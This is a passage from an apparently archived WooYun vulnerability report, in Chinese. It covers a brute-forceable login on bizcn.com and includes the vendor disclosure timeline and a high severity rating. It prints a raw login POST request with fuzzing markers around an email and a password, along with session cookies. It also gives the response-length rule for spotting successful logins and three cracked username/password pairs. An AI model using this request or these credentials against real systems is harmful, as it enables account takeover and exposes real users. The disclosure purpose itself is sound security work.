乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-24: 厂商已经确认,细节仅向厂商公开 2015-10-04: 细节向核心白帽子及相关领域专家公开 2015-10-14: 细节向普通白帽子公开 2015-10-24: 细节向实习白帽子公开 2015-11-08: 细节向公众公开
66666666666666
用户登录处可暴力破解http://www.bizcn.com/login?module=memberzone
POST /login HTTP/1.1Host: www.bizcn.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.bizcn.com/login?module=memberzoneCookie: ptrsrv=48a3d0dc88dd3a2f242b7f5cc6400836; JSESSIONID=85F077DA4B16769D6CBFE4758A3F21B1-vcp; Hm_lvt_074a14d55646fb99f2b80b6d5ce4a377=1442915997; Hm_lpvt_074a14d55646fb99f2b80b6d5ce4a377=1442916069; CNZZDATA1253027197=1004649916-1442915996-%7C1442915996; IESESSION=alive; pgv_pvi=5128890368; pgv_si=s9461657600Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 126module=enterzone&login_name=§kcorppropertygroup%40163.com§&password=§aaaaaaaaaaaaa§&validatetoken=c56805ac434841b8b7eb5ba3932d7fbe
token加了毫无用处,简直是摆设。。。可爆破。
返回长度大于5000即为成功的账号。
user:sale pwd:sale
user:songjun pwd:songjun
user:weibo pwd:weibo
看着办26666
危害等级:高
漏洞Rank:15
确认时间:2015-09-24 09:51
收到,处理 中
暂无